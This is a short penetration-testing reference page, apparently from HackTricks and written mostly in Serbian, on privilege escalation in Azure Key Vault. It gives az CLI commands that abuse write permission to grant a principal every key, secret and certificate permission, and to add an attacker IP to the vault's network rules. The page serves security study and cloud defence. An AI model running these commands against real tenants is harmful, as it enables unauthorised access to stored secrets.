# Az - Key Vault Privesc

{{#include ../../../banners/hacktricks-training.md}}

## Azure Key Vault

Za više informacija o ovoj usluzi pogledajte:

{{#ref}}
../az-services/az-keyvault.md
{{#endref}}

### `Microsoft.KeyVault/vaults/write`

Napadač sa ovom dozvolom će moći da izmeni politiku ključnog trezora (ključni trezor mora koristiti pristupne politike umesto RBAC-a).
```bash
# If access policies in the output, then you can abuse it
az keyvault show --name <vault-name>

# Get current principal ID
az ad signed-in-user show --query id --output tsv

# Assign all permissions
az keyvault set-policy \
--name <vault-name> \
--object-id <your-object-id> \
--key-permissions all \
--secret-permissions all \
--certificate-permissions all \
--storage-permissions all
```
### Modify Network Restrictions

Možda imate dovoljno dozvola da pristupite osetljivim podacima (kao što je vrednost tajne), ali ne možete da mu pristupite jer je ključna riznica ograničena na određenu mrežu. Ako imate dozvolu da modifikujete mrežna ograničenja, možete dodati svoju IP adresu na listu dozvoljenih IP adresa.
```bash
# Get the current network restrictions
az keyvault network-rule list --name <vault-name>

# Add your IP to the list
az keyvault network-rule add --name <vault-name> --ip-address <your-ip>
```
{{#include ../../../banners/hacktricks-training.md}}
